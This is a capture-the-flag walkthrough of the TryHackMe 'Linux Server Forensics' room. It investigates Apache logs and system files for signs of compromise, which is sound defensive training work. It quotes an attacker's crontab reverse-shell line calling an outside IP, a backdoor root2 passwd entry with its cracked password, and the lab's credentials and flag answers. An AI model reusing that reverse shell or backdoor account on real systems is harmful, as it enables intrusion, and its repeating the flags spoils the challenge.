Tryhackme — Linux Server Forensics
first VM
- 10.10.197.91
- Username — ‘fred’
- Password — ‘FredRules!’
#2 :- Navigate to /var/log/apache2?
fred@acmeweb:~$ cd /var/log/apache2
fred@acmeweb:/var/log/apache2$ ls
access.log error.log other_vhosts_access.log
fred@acmeweb:/var/log/apache2$
#3 :- How many different tools made requests to the server?
Answer :- 2
#4 :- Name a path requested by Nmap?
fred@acmeweb:/var/log/apache2$ cat access.log | grep nmap | cut -d ‘“‘ -f 2 | sort | uniq
GET /evox/about HTTP/1.1
GET /favicon.ico HTTP/1.1
GET /.git/HEAD HTTP/1.1
GET /HNAP1 HTTP/1.1
GET / HTTP/1.1
GET /nmaplowercheck1618912425 HTTP/1.1
GET /robots.txt HTTP/1.1
IDRT / HTTP/1.1
OPTIONS / HTTP/1.1
POST / HTTP/1.1
POST /sdk HTTP/1.1
PROPFIND / HTTP/1.1
Answer :- /nmaplowercheck1618912425
Web Server Analysis
#5 :- What page allows users to upload files?
Answer :- contact.php
#6 :- What IP uploaded files to the server?
fred@acmeweb:/var/log/apache2$ grep “POST” access.log
192.168.56.24 — — [20/Apr/2021:09:53:46 +0000] “POST / HTTP/1.1” 200 2495 “-” “Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 — — [20/Apr/2021:09:53:46 +0000] “POST /sdk HTTP/1.1” 404 454 “-” “Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
Binary file access.log matches
Answer :- 192.168.56.24
#7 :- Who left an exposed security notice on the server?
fred@acmeweb:/var/log/apache2$ cat access.log | grep -i dirbus | grep -v 404 | cut -d ‘“‘ -f 2 | sort | uniq
Answer :- fred
#8 :- What command and option did the attacker use to establish a backdoor?
cat /etc/crontab
root2 sh -i >& /dev/tcp/192.168.56.206/1234 0>&1
Answer : — sh -i
#9 :- What is the password of the second root account?
fred@acmeweb:/$ cd /etc/
fred@acmeweb:/etc$ cat passwd
fred:x:1000:1000:fred:/home/fred:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
Answer :- mrcake
second VM
#1 :- Name one of the non-standard HTTP Requests.
hint — Grep searches can be inverted using the -v option to select non-matching lines. Search for GET or POST requests.
command — cat access.log | cut -d ‘“‘ -f 2 | sort | uniq
GET /static/img/Turbo.jpg HTTP/1.1
GXWR / HTTP/1.1
OPTIONS / HTTP/1.1
POST /contact.php HTTP/1.1
\x16\x03
Answer :- GXWR
#2 :- At what time was the Nmap scan performed? (format: HH:MM:SS)
fred@acmeweb:/var/log/apache2$ cat access.log | grep -a GXWR
192.168.56.206 - - [20/Apr/2021:13:30:15 +0000] "GXWR / HTTP/1.1" 501 498 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML"
Answer : — 13:30:15
#3 :- What username and hostname combination can be found in one of the authorized_keys files? (format: username@hostname)
fred@acmeweb:/var/log/apache2$ sudo cat /root/.ssh/authorized_keys
[sudo] password for fred:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYCKt0bYP2YIwMWdJWqF3lr3Drs3sS9hiybsxz9W6dG6d15mg0SVMSe5H+rPM6VmzOKJaVpDjT1Ll5eR6YcbefTF2bMXHveyvcrzDxyZeWdgBs5u8/4DZxEN6fq6IZRRftmrMgMzSnpmdCm8kvacgq3lIjLx/sKAlX9GqPIz09t0Rk5MB7zk3lg1wdTZxZwwCHPbZW7mGlVcxNBB9wdbAmcvezscoF0i7v0tY8iCoFlrBysOMBMrEJji2UONtI/wrt7AvoK+gshiG7VTjZ2oQBacnyHRToXHxOZiSIbCQrJ6rCxa32QOGQNmAVIucqYjRbJedz0NbGq7M9B+hBmG/mdtsoGOXQKyzoUlAbulRXjSVtManiUyq9im1HBHfuduiBrbfcOKz24NMT7RaIsPsZCUCpfHaT7S5XplQypAjkxABds8jod/TXcTYibdWE9scrUUidgCsPELQlKEfhhZ8+cyjbMCGNB5LOgieJSVk6D1JC97TaFNi4X9/9i2UA+L0= kali@kali
Answer :- kali@kali
#4 :- What is the first command present in root's bash_history file?
fred@acmeweb:/var/log/apache2$ sudo head /root/.bash_history
nano /etc/passwd
exit
Answer :- nano /etc/passwd
Final VM
#1 :- Figure out what’s going on and find the flag.
hint — Use the above to locate and open the script that’s causing the errors. You might want to check the IpManager service. Flag format: [XXXXXXXXXX]
fred@acmeweb:~$ systemctl status IpManager.service
● IpManager.service
Loaded: loaded (/var/lib/network/IpManager.service; enabled; vendor preset: enabled)
Active: active (running) since Wed 2021–06–02 13:44:20 UTC; 26s ago
Main PID: 1462 (bash)
Tasks: 2 (limit: 499)
CGroup: /system.slice/IpManager.service
├─1462 /bin/bash /etc/network/ZGtsam5hZG1ua2Fu.sh
└─1485 sleep 10
fred@acmeweb:~$ cat /etc/network/ZGtsam5hZG1ua2Fu.sh
##[gh0st_1n_the_machine]
##
Answer :- gh0st_1n_the_machine
